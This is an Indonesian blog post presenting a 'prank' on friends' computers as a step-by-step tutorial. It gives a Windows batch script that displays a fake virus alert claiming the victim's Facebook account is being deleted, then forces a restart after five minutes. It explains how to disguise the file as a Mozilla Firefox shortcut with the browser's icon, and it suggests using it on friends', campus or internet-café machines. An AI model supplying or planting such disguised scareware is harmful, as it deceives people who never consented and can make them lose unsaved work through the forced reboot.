Translate

Senin, 10 September 2012

Cara Jahil di Komputer teman

hei! saya si admin tampan ini akan share trik jahil ! trik ini seperti virus tapi bukan virus cuma bikin deg-deg kan xD trik ini bisa kamu pakai untuk nge jahilin temen kamu! [dosa tanggung sendiri lho...] saya sih sebenarnya gak enak mau share trik ini [sok bijak] tapi kayaknya trik ini lumayan keren xD
silahkan di simak!

1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter

2. Copy kode ini dan pastekan di notepad kamu


@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”

3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi

nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)

4. Sekarang klik kanan desktopmu dan pilih New => Shortcut

5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file

.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop

6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu

dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya

sebagai tipuan aja)

7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah

mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai

Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?

Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon

Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox

Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin

iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi ..

Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu

praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..

Tidak ada komentar:

Posting Komentar

#Komennya Orang pintar selalu bemutu
#Blog ini bukan sekolahan jadi gak usah absen pagi,siang,sore dsb
#Blog ini bukan pom bensin jadi jangan pernah pesen PERTAMAX disini
#satu lagi kami Anti SPAM dan SARA